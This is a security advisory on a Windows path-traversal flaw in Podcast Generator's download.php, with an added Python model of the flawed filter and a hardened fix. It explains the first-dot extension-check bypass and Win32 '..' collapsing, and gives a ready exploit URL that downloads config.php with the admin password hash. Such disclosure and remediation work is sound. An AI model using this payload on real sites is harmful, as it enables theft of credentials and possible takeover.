The vulnerable file is download.php. Let's start from lines 25-27:
-------------------------------------------------------
25. $filename = $_GET['filename'];
26.
27. $filename = eregi_replace("/", "", $filename);
-------------------------------------------------------
So PHP strips every forward slash from the filename variable, but under Windows that doesn't matter, because we can use the backslash ( \ ) as the directory separator instead. OK, that was the simple part; now comes the real challenge:
-------------------------------------------------------
33. if (file_exists("$filename_path") ) { // check real existence of the file. Avoid possible cross-site scripting attacks
34.
35. $file_media = explode(".",$filename); //divide filename from extension
36.
37. $fileData = checkFileType($file_media[1],$podcast_filetypes,$filemimetypes);
-------------------------------------------------------
Line 33 is no problem as long as the file really exists, but on line 37 there is a call to checkFileType:
-------------------------------------------------------
15. function checkFileType ($filetype,$podcast_filetypes,$filemimetypes) {
16.   $i=0;
17.   $bool=false;
18.   $fileData = array();
19.
20.   while (($i < sizeof($podcast_filetypes)) && $bool==false) {
21.     if ($filetype==$podcast_filetypes[$i]) {
22.       $fileData[0]=$podcast_filetypes[$i];
23.       $fileData[1]=$filemimetypes[$i];
24.       $bool=true;
25.     }
26.     $i+=1;
27.   }
28.   return $fileData;
29. }
-------------------------------------------------------
which essentially checks whether the string after the FIRST dot (explode() element [1]) is in the list of supported media. It never looks at the real extension, i.e. the string after the last dot, and it never looks at what follows element [1] at all.

<offtopic>
Not useful for this vuln, but I want to highlight one thing. The supported file extensions are stored in supported_media.php in this format:
-------------------------------------------------------
18. $podcast_filetypes = array(); //filetypes array to handle multiple filetypes
19.
20. $podcast_filetypes[0]="mp3";
-------------------------------------------------------
If the author had forgotten to declare the new array variable (line 18), it would be possible to inject a fake extension into the list whenever register_globals is turned on.
</offtopic>

Back to the vuln. I have discovered that Windows, when accessing nested directories, does not check that every directory name given in the path exists; it only checks whether the resulting path exists. The ".." components are collapsed lexically by the Win32 path normalization before the filesystem is ever consulted, so a non-existent directory followed by ".." simply disappears. For example, see this cmd session:
-------------------------------------------------------
Z:\media\AA845DA3845D72B5>mkdir tmp

Z:\media\AA845DA3845D72B5>cd tmp

Z:\media\AA845DA3845D72B5\tmp>dir
 Volume in drive Z has no label.
 Volume Serial Number is 0000-0000

 Directory of Z:\media\AA845DA3845D72B5\tmp

09/03/2010  13.33    <DIR>          .
09/03/2010  13.33    <DIR>          ..
               0 File(s)              0 bytes
               2 Dir(s)     299,372,544 bytes free

Z:\media\AA845DA3845D72B5\tmp>
-------------------------------------------------------
So the new directory is empty, but:
-------------------------------------------------------
Z:\media\AA845DA3845D72B5\tmp>cd donno\wanna\write\..\..\..\..\

Z:\media\AA845DA3845D72B5>
-------------------------------------------------------
Windows does not return an error; three non-existent directories plus four ".." net out to one level up, and that is where it goes. Now we are ready to exploit podcastgen with a URL like this:

http://www.example.com/podcastgen/download.php?filename=.mp3.\..\..\config.php

explode(".") turns ".mp3.\..\..\config.php" into "", "mp3", "\", "", "\", "", "\config", "php", so element [1] is "mp3" and checkFileType is satisfied, while Windows collapses the non-existent ".mp3." directory and the two ".." and opens config.php two levels above the media directory. This downloads the config file with the hashed admin password, which, if cracked, can lead to remote code execution.

[BlackHawk - 09/03/2010 - Some rights reserved (http://creativecommons.org/licenses/by-nc-sa/2.5/it/) ]
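To make the two halves of the bug concrete, here is an added example (my own Python model, not code from the advisory or from Podcast Generator) that replicates the download.php filter logic quoted above and then applies the same lexical "." / ".." collapsing Windows performs, using ntpath.normpath so it runs on any OS. The media directory path, the allow-list contents and the way the media directory is prepended to the user value are assumptions; the advisory does not show how $filename_path is built. A hardened variant is included beside it for contrast.

```python
"""Model of the podcastgen download.php filter (added example, assumptions noted inline)."""
import ntpath

# Assumed layout: download.php prepends the media directory to the user-supplied name
# and config.php lives two levels above it (podcastgen root).
MEDIA_DIR = r"C:\inetpub\wwwroot\podcastgen\media"

# Constructed allow-list; the real one is built in supported_media.php.
PODCAST_FILETYPES = ["mp3", "ogg", "m4a"]


def vulnerable_filter(filename: str):
    """Replicates lines 27-37 of download.php.

    Returns the path Windows would end up opening, or None when the
    checkFileType() equivalent rejects the name.
    """
    filename = filename.replace("/", "")          # eregi_replace("/", "", $filename): backslashes survive
    file_media = filename.split(".")              # explode(".", $filename)
    ext = file_media[1] if len(file_media) > 1 else ""
    if ext not in PODCAST_FILETYPES:              # checkFileType($file_media[1], ...)
        return None
    # Win32 normalizes '.' and '..' lexically before touching the filesystem,
    # so a non-existent component followed by '..' is simply dropped.
    return ntpath.normpath(ntpath.join(MEDIA_DIR, filename))


def hardened_filter(filename: str):
    """Fix: reject any separator or traversal, check the LAST extension,
    and verify the normalized path is still inside MEDIA_DIR."""
    base = ntpath.basename(filename.replace("/", "\\"))
    if base in ("", ".", "..") or base != filename:
        return None                               # a separator or '..' was present
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in PODCAST_FILETYPES:
        return None
    full = ntpath.normpath(ntpath.join(MEDIA_DIR, base))
    if ntpath.commonpath([MEDIA_DIR, full]) != MEDIA_DIR:
        return None                               # defense in depth: containment check
    return full


if __name__ == "__main__":
    payload = r".mp3.\..\..\config.php"           # the advisory's payload
    print("vulnerable:", vulnerable_filter(payload))
    print("hardened:  ", hardened_filter(payload))
    print("legit:     ", hardened_filter("episode.mp3"))
```

vulnerable_filter() shows both halves at once: element [1] of the split is "mp3", so the extension check passes, and normpath() reduces media\.mp3.\..\..\config.php to the podcastgen root's config.php, exactly the lexical collapse the cd experiment above demonstrated. hardened_filter() refuses anything that is not a bare basename with an allowed final extension and still checks containment after normalization.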